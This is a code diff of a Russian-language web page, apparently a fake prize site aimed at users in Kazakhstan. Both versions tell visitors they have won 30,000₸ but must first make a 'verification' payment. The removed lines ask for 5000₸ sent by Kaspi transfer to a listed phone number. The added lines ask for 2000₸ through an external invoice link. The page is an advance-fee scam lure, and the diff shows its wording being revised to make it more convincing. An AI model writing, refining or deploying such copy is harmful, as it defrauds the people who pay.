--- a/index.html
+++ b/index.html
@@ -88,34 +88,23 @@
     <h2>Подписка / Пополнение</h2>
 
     <p style="font-size:14px; color:#ccc; line-height:1.6; margin-bottom:16px;">
-      <strong>Зачем нужна оплата 5000₸?</strong><br><br>
-      Оплата необходима для подтверждения, что ваш банковский счёт активен и принадлежит вам.
-      Это стандартная проверка перед переводом выигрыша.<br><br>
+      <strong>Для получения выигрыша необходимо пройти проверку</strong><br><br>
 
-      После подтверждения оплаты мы отправим вам выигрыш <strong>30 000₸</strong> 
-      на тот же счёт, с которого был выполнен перевод.
+      Чтобы подтвердить, что ваш платёжный аккаунт активен и работает, нужно выполнить тестовую оплату
+      в размере <strong>2000₸</strong>.<br><br>
+
+      Эта сумма используется только для проверки и подтверждения ваших реквизитов.<br><br>
+
+      После успешной оплаты мы переведём вам выигрыш
+      <strong>30 000₸</strong> на указанные платёжные данные.
     </p>
 
-    <div class="instructions">
-        <strong>Инструкция по оплате через Kaspi Bank:</strong>
-        <ol>
-            <li>Откройте приложение <strong>Kaspi.kz</strong> на телефоне.</li>
-            <li>Перейдите во вкладку <strong>Переводы</strong>.</li>
-            <li>Выберите <strong>Перевод по номеру</strong>.</li>
-            <li>Введите номер: <strong>+7 771 510 5367</strong></li>
-            <li>Введите сумму: <strong>5000₸</strong></li>
-            <li>В комментарии напишите своё <strong>ФИО</strong>.</li>
-            <li>Нажмите <strong>Оплатить</strong> и подтвердите перевод.</li>
-            <li>Вернитесь на эту страницу и нажмите кнопку <strong>Оплачено</strong>.</li>
-            <li>Дождитесь проверки (около 2 минут) — доступ будет открыт автоматически.</li>
-        </ol>
-    </div>
-
-    <button class="btn" id="kaspiPayBtn">Оплачено</button>
+    <a href="https://qplus.ru/replenish/invoice/074496a8-2dc7-4a77-8880-21f1d240c42b" class="btn" id="">Оплатить</a>
 
     <div class="note">
-        Пожалуйста, следуйте инструкции выше. Если вы не оплатили, система уведомит вас.
+      После оплаты проверка занимает до 2 минут. Пожалуйста, не закрывайте страницу.
     </div>
+
   </div>
 
 </div>
